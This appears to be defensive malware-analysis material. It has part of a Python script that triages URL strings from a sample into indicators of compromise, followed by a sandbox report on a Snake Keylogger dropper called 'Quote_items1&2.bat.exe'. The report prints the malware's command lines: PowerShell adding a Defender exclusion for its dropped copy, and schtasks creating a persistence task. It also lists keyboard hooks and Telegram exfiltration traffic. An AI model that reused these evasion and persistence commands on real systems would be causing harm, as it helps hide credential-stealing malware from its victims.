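    "https://duckduckgo.com/chrome_newtab",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
    "https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
    "https://chrome.google.com/webstore?hl=en8",
    "https://www.office.com/8",
]


def _is_ip(host):
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def classify_host(host, port):
    """Label one host; port is None when the URL carried no explicit port."""
    if host in RECON_HOSTS:
        return "recon_service"
    if host in EXFIL_HOSTS:
        return "exfil_service"
    if host == "schemas.xmlsoap.org":
        return "dotnet_constant"       # WS-* claim URI baked into the .NET runtime
    if host.startswith("mail."):
        return "mail_server"           # matches the DNS query and the :587 flow
    if host.endswith(DYNDNS_SUFFIXES) or (_is_ip(host) and port not in (None, 80, 443)):
        return "c2_candidate"          # dynamic DNS, or a raw IP on a non-standard port
    if host.endswith(BROWSER_NOISE):
        return "browser_artifact"
    return "unknown"                   # leave for manual review


def triage_strings(strings):
    """Group URL strings by host: {host: {"label", "ports", "samples"}}."""
    result = {}
    for s in strings:
        u = urlsplit(s)
        if u.scheme not in ("http", "https") or not u.hostname:
            continue
        host = u.hostname.lower()
        entry = result.setdefault(host, {"label": None, "ports": set(), "samples": []})
        if u.port is not None:
            entry["ports"].add(u.port)
        entry["samples"].append(s)
        entry["label"] = classify_host(host, u.port)
    return result


def iocs(strings):
    """Hosts worth blocking or reporting, sorted, each with its observed ports."""
    keep = {"c2_candidate", "mail_server"}
    return sorted((h, sorted(v["ports"])) for h, v in triage_strings(strings).items()
                  if v["label"] in keep)


if __name__ == "__main__":
    for host, info in triage_strings(SAMPLE_STRINGS).items():
        print(f"{info['label']:16} {host} ports={sorted(info['ports']) or '-'}")
    print("IOCs:", iocs(SAMPLE_STRINGS))
```

api.telegram.org is deliberately not in the IOC output: the reportable indicator for that channel is the bot token, not the host. bteenerji.com lands in "unknown" because nothing in the string itself marks it as hostile; the analyst ties it to the mail server by the shared domain.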
Source: unknown | Network traffic detected: HTTP traffic on port 443, observed in both directions on 22 client ports: 49815, 49834, 49843, 49853, 49863, 49874, 49896, 49902, 49909, 49911, 49917, 49925, 49939, 49944, 49951, 64729, 64736, 64742, 64747, 64752, 64757, 64776
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49917 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:64757 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Quote_items1&2.bat.exe, HookManager.cs | .Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: wJFLKBSbTtvP.exe.0.dr, HookManager.cs | .Net Code: EnsureSubscribedToGlobalKeyboardEvents

                System Summary

                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 0_2_00007FFD344EE940
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 0_2_00007FFD344E08ED
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 0_2_00007FFD344EC2F3
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 10_2_00007FFD34508A65
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD345008ED
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD3450E9C0
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD3450C989
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD3450C21D
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD3450C318
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD3450C390
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD3450C370
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 15_2_00007FFD34518A65
                Source: Quote_items1&2.bat.exe | Static PE information: No import functions for PE file found
                Source: wJFLKBSbTtvP.exe.0.dr | Static PE information: No import functions for PE file found
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameReactionDiffusion.dll0 vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemscorlib.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuyCa.exef# vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Core.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2323276823.0000000001100000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameReactionDiffusion.dll0 vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCamden.exe. vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCamden.exe. vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000000.2137986969.0000000000702000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameuyCa.exef# vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.0000000015685000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGreenEnergy.dll@ vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2334172628.000000001EBA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameGreenEnergy.dll@ vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCamden.exe. vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe | Binary or memory string: OriginalFilenameuyCa.exef# vs Quote_items1&2.bat.exe
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Quote_items1&2.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wJFLKBSbTtvP.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/11@4/4
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Mutant created: \Sessions\1\BaseNamedObjects\CVzTfkmlxZExDSwWir
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File created: C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp
                Source: Quote_items1&2.bat.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000350B000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003520000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003511000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003557000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003502000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000354B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quote_items1&2.bat.exe | Virustotal: Detection: 45%
                Source: Quote_items1&2.bat.exe | ReversingLabs: Detection: 45%
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File read: C:\Users\user\Desktop\Quote_items1&2.bat.exe
                Source: unknown | Process created: C:\Users\user\Desktop\Quote_items1&2.bat.exe "C:\Users\user\Desktop\Quote_items1&2.bat.exe"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"
                Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Users\user\Desktop\Quote_items1&2.bat.exe C:\Users\user\Desktop\Quote_items1&2.bat.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp"
                Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Process created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
